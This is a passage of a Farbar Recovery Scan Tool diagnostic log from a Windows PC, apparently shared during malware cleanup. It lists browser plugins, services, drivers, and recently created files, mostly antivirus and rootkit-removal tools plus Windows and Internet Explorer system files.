FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50905.0\npctrl.dll [2017-02-10] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-03-05] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @pandasecurity.com/activescan -> C:\Program Files (x86)\Panda Security\ActiveScan 2.0\npwrapper.dll [2010-07-27] (Panda Security, S.L.)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-17] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-17] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-04] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3698744866-2675293530-421701469-1001: @facebook.com/FBPlugin,version=1.0.3 -> C:\Users\KEKLR\AppData\Roaming\Facebook\npfbplugin_1_0_3.dll [2010-06-09] ( )
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2017-04-04] (Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxp://www.google.com
CHR StartupUrls: Default -> "hxxp://www.google.com"
CHR Profile: C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default [2017-04-09]
CHR HKLM-x32\...\Chrome\Extension: [jkfpchpiljkaemlpmpebnglgkomamfeo] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AESTFilters; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\AESTSr64.exe [89600 2009-03-02] (Andrea Electronics Corporation)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3737792 2017-03-26] (Microsoft Corporation)
R2 EpsonCustomerResearchParticipation; C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe [677376 2016-08-02] (SEIKO EPSON CORPORATION)
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [144560 2012-05-17] (Seiko Epson Corporation)
R2 EPSON_PM_RPCV4_06; C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE [152640 2013-04-15] (SEIKO EPSON CORPORATION)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [31776 2016-12-07] (HP Inc.)
R2 kss; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [919296 2015-06-03] (Kaspersky Lab ZAO)
R2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2009-11-20] (Hewlett-Packard Company) [File not signed]
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
S2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-12-03] (Hewlett-Packard) [File not signed]
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
S3 ose; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [198192 2017-03-25] (Microsoft Corporation) [File not signed]
S2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2008-12-03] (Hewlett-Packard) [File not signed]
R2 RichVideo; C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe [247152 2009-01-21] ()
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\STacSV64.exe [247808 2010-03-23] (IDT, Inc.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Corporation)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [130688 2016-07-22] (Samsung Electronics Co., Ltd.)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 npf; C:\Windows\System32\drivers\npf.sys [36600 2014-08-18] (Riverbed Technology, Inc.)
R0 pavboot; C:\Windows\System32\drivers\pavboot64.sys [33800 2009-06-30] (Panda Security, S.L.)
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [164992 2016-07-22] (Samsung Electronics Co., Ltd.)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [28272 2017-04-10] ()

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-11 17:40 - 2017-04-11 17:41 - 00027583 _____ C:\Users\KEKLR\Desktop\FRST.txt
2017-04-10 19:32 - 2017-04-10 19:33 - 35207600 _____ (Adlice Software ) C:\Users\KEKLR\Desktop\setup.exe
2017-04-10 19:20 - 2017-04-10 19:25 - 00002386 _____ C:\Users\KEKLR\Desktop\Rkill.txt
2017-04-10 19:18 - 2017-04-10 19:18 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\KEKLR\Desktop\rkill.exe
2017-04-10 19:17 - 2017-04-10 19:17 - 00000000 ____D C:\TDSSKiller_Quarantine
2017-04-10 17:31 - 2017-04-10 19:17 - 00220946 _____ C:\TDSSKiller.3.1.0.12_10.04.2017_17.31.42_log.txt
2017-04-10 17:26 - 2017-04-10 17:26 - 04747704 _____ (AO Kaspersky Lab) C:\Users\KEKLR\Desktop\tdsskiller.exe
2017-04-09 18:58 - 2017-04-10 20:42 - 00028272 _____ C:\Windows\system32\Drivers\TrueSight.sys
2017-04-09 18:56 - 2017-04-09 18:57 - 00000000 ____D C:\ProgramData\RogueKiller
2017-04-09 18:55 - 2017-04-10 19:36 - 00000858 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2017-04-09 18:55 - 2017-04-10 19:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2017-04-09 18:55 - 2017-04-10 19:36 - 00000000 ____D C:\Program Files\RogueKiller
2017-04-09 18:09 - 2017-04-11 17:34 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2017-04-09 18:08 - 2017-04-11 17:34 - 00000000 ____D C:\Users\KEKLR\Desktop\mbar
2017-04-09 18:07 - 2017-04-09 18:07 - 16563352 _____ (Malwarebytes Corp.) C:\Users\KEKLR\Desktop\mbar-1.09.3.1001.exe
2017-04-09 17:48 - 2017-04-09 17:57 - 00016594 _____ C:\Users\KEKLR\Desktop\Fixlog.txt
2017-04-09 09:18 - 2017-04-09 09:18 - 00000640 _____ C:\Users\KEKLR\Documents\EEST 4.9.2017.txt
2017-04-08 18:18 - 2017-04-08 18:18 - 06752896 _____ (ESET spol. s r.o.) C:\Users\KEKLR\Desktop\esetonlinescanner_enu.exe
2017-04-08 18:18 - 2017-04-08 18:18 - 00000000 ____D C:\Users\KEKLR\AppData\Local\ESET
2017-04-08 16:52 - 2017-04-08 16:52 - 00029153 _____ C:\ProgramData\agent.1491684753.bdinstall.bin
2017-04-08 16:43 - 2017-04-08 16:43 - 00001106 _____ C:\Users\KEKLR\Desktop\FRST - Shortcut.lnk
2017-04-08 15:31 - 2017-04-08 15:31 - 08465968 _____ C:\Users\KEKLR\Desktop\bitdefender_quickscan.exe
2017-04-08 15:31 - 2017-04-08 15:31 - 00028766 _____ C:\ProgramData\agent.1491679893.bdinstall.bin
2017-04-08 15:27 - 2017-04-08 15:27 - 00028972 _____ C:\ProgramData\agent.1491679676.bdinstall.bin
2017-04-08 15:18 - 2017-04-08 15:18 - 00047906 _____ C:\ProgramData\agent.1491679133.bdinstall.bin
2017-04-08 15:18 - 2017-04-08 15:18 - 00000000 ____D C:\ProgramData\Bitdefender Agent
2017-04-08 15:16 - 2017-04-08 15:16 - 00524248 _____ (F-Secure Corporation) C:\Users\KEKLR\Downloads\F-SecureOnlineScanner(1).exe
2017-04-08 15:15 - 2017-04-08 15:17 - 00524248 _____ (F-Secure Corporation) C:\Users\KEKLR\Desktop\F-SecureOnlineScanner.exe
2017-04-08 15:14 - 2017-04-08 15:14 - 00524248 _____ (F-Secure Corporation) C:\Users\KEKLR\Downloads\F-SecureOnlineScanner (1).exe
2017-04-08 15:13 - 2017-04-08 15:13 - 00524248 _____ (F-Secure Corporation) C:\Users\KEKLR\Downloads\F-SecureOnlineScanner.exe
2017-04-08 15:09 - 2017-04-08 15:26 - 00000000 ____D C:\Users\KEKLR\AppData\Local\FSDART
2017-04-08 15:09 - 2017-04-08 15:09 - 00000000 ____D C:\Users\KEKLR\AppData\Local\F-Secure
2017-04-08 14:47 - 2017-04-08 15:06 - 00064062 _____ C:\Users\KEKLR\Desktop\Addition.txt
2017-04-08 14:43 - 2017-04-08 14:43 - 00001532 _____ C:\Users\KEKLR\Documents\malwarebytes scan 4.8.2017 rootkit.txt
2017-04-08 14:36 - 2017-04-08 14:36 - 00001140 _____ C:\Users\KEKLR\Desktop\SALog 4.8.2017.txt
2017-04-08 14:35 - 2017-04-10 19:30 - 00001140 _____ C:\Users\KEKLR\Desktop\SALog.txt
2017-04-08 14:27 - 2017-04-08 14:27 - 00899584 _____ C:\Users\KEKLR\Downloads\RGSA.exe
2017-04-08 14:26 - 2017-04-08 14:26 - 00899584 _____ C:\Users\KEKLR\Desktop\RGSA.exe
2017-04-08 14:12 - 2017-04-08 14:16 - 00064059 _____ C:\Users\KEKLR\Downloads\Addition.txt
2017-04-08 14:10 - 2017-04-08 15:07 - 00071568 _____ C:\Users\KEKLR\Downloads\FRST.txt
2017-04-08 14:06 - 2017-04-11 17:40 - 00000000 ____D C:\FRST
2017-04-08 14:06 - 2017-04-08 14:10 - 02424832 _____ (Farbar) C:\Users\KEKLR\Downloads\FRST64 (1).exe
2017-04-08 13:59 - 2017-04-08 13:59 - 02424832 _____ (Farbar) C:\Users\KEKLR\Desktop\FRST64.exe
2017-04-08 13:50 - 2017-04-08 13:50 - 00235240 ____H C:\Users\KEKLR\Documents\~WRL0003.tmp
2017-04-08 13:47 - 2017-04-08 13:49 - 00000003 _____ C:\Users\KEKLR\Documents\malwarescann 4.8.2017 2.txt
2017-04-08 10:51 - 2016-08-22 15:20 - 00332512 _____ (Trend Micro Inc.) C:\Windows\system32\Drivers\tmcomm.sys
2017-04-08 10:39 - 2017-04-08 12:42 - 00000003 _____ C:\Users\KEKLR\Documents\malwarescann 4.8.2017.txt
2017-03-15 19:42 - 2017-03-04 13:24 - 00394448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-03-15 19:42 - 2017-03-04 12:39 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-03-15 19:42 - 2017-03-04 04:20 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2017-03-15 19:42 - 2017-03-04 04:20 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2017-03-15 19:42 - 2017-03-04 04:02 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2017-03-15 19:42 - 2017-03-04 04:01 - 00576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-03-15 19:42 - 2017-03-04 04:01 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2017-03-15 19:42 - 2017-03-04 04:01 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-03-15 19:42 - 2017-03-04 04:01 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2017-03-15 19:42 - 2017-03-04 03:59 - 02895360 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-03-15 19:42 - 2017-03-04 03:52 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2017-03-15 19:42 - 2017-03-04 03:51 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2017-03-15 19:42 - 2017-03-04 03:48 - 25746944 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-03-15 19:42 - 2017-03-04 03:46 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2017-03-15 19:42 - 2017-03-04 03:45 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2017-03-15 19:42 - 2017-03-04 03:45 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2017-03-15 19:42 - 2017-03-04 03:45 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-03-15 19:42 - 2017-03-04 03:44 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-03-15 19:42 - 2017-03-04 03:36 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2017-03-15 19:42 - 2017-03-04 03:32 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2017-03-15 19:42 - 2017-03-04 03:31 - 06045696 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-03-15 19:42 - 2017-03-04 03:23 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2017-03-15 19:42 - 2017-03-04 03:21 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2017-03-15 19:42 - 2017-03-04 03:16 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2017-03-15 19:42 - 2017-03-04 03:16 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-03-15 19:42 - 2017-03-04 03:13 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-03-15 19:42 - 2017-03-04 03:11 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2017-03-15 19:42 - 2017-03-04 02:57 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-03-15 19:42 - 2017-03-04 02:55 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-03-15 19:42 - 2017-03-04 02:54 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-03-15 19:42 - 2017-03-04 02:52 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-03-15 19:42 - 2017-03-04 02:52 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2017-03-15 19:42 - 2017-03-04 02:26 - 15259648 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-03-15 19:42 - 2017-03-04 02:25 - 03241984 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-03-15 19:42 - 2017-03-04 02:12 - 01545728 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-03-15 19:42 - 2017-03-04 02:02 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-03-15 19:42 - 2017-03-04 00:18 - 20281856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-03-15 19:42 - 2017-03-02 14:16 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2017-03-15 19:42 - 2017-03-02 14:02 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2017-03-15 19:42 - 2017-03-02 14:01 - 00499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2017-03-15 19:42 - 2017-03-02 14:01 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2017-03-15 19:42 - 2017-03-02 14:01 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2017-03-15 19:42 - 2017-03-02 14:00 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-03-15 19:42 - 2017-03-02 13:55 - 02287104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-03-15 19:42 - 2017-03-02 13:54 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2017-03-15 19:42 - 2017-03-02 13:53 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2017-03-15 19:42 - 2017-03-02 13:51 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2017-03-15 19:42 - 2017-03-02 13:50 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2017-03-15 19:42 - 2017-03-02 13:49 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-03-15 19:42 - 2017-03-02 13:49 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2017-03-15 19:42 - 2017-03-02 13:41 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2017-03-15 19:42 - 2017-03-02 13:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2017-03-15 19:42 - 2017-03-02 13:35 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2017-03-15 19:42 - 2017-03-02 13:32 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2017-03-15 19:42 - 2017-03-02 13:31 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2017-03-15 19:42 - 2017-03-02 13:29 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-03-15 19:42 - 2017-03-02 13:28 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2017-03-15 19:42 - 2017-03-02 13:22 - 04604416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-03-15 19:42 - 2017-03-02 13:21 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-03-15 19:42 - 2017-03-02 13:19 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-03-15 19:42 - 2017-03-02 13:17 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-03-15 19:42 - 2017-03-02 13:17 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2017-03-15 19:42 - 2017-03-02 13:11 - 13654528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-03-15 19:42 - 2017-03-02 12:53 - 02767360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-03-15 19:42 - 2017-03-02 12:50 - 01312768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2017-03-15 19:42 - 2017-03-02 12:50 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-03-15 19:42 - 2017-02-11 11:58 - 00462848 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-03-15 19:42 - 2017-02-11 11:58 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-03-15 19:42 - 2017-02-11 11:58 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2017-03-15 19:42 - 2017-02-10 12:32 - 00803328 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2017-03-15 19:42 - 2017-02-10 12:32 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-03-15 19:42 - 2017-02-10 12:17 - 00628736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2017-03-15 19:42 - 2017-02-10 12:17 - 00312832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2017-03-15 19:42 - 2017-02-10 10:33 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2017-03-15 19:42 - 2017-02-09 12:36 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2017-03-15 19:42 - 2017-02-09 12:35 - 05548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-03-15 19:42 - 2017-02-09 12:35 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2017-03-15 19:42 - 2017-02-09 12:35 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2017-03-15 19:42 - 2017-02-09 12:35 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2017-03-15 19:42 - 2017-02-09 12:33 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00040960 _____ (Microsoft Corporation) C:\Windows\system32\WcsPlugInService.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00625664 _____ (Microsoft Corporation) C:\Windows\system32\mscms.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00250880 _____ (Microsoft Corporation) C:\Windows\system32\icm32.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
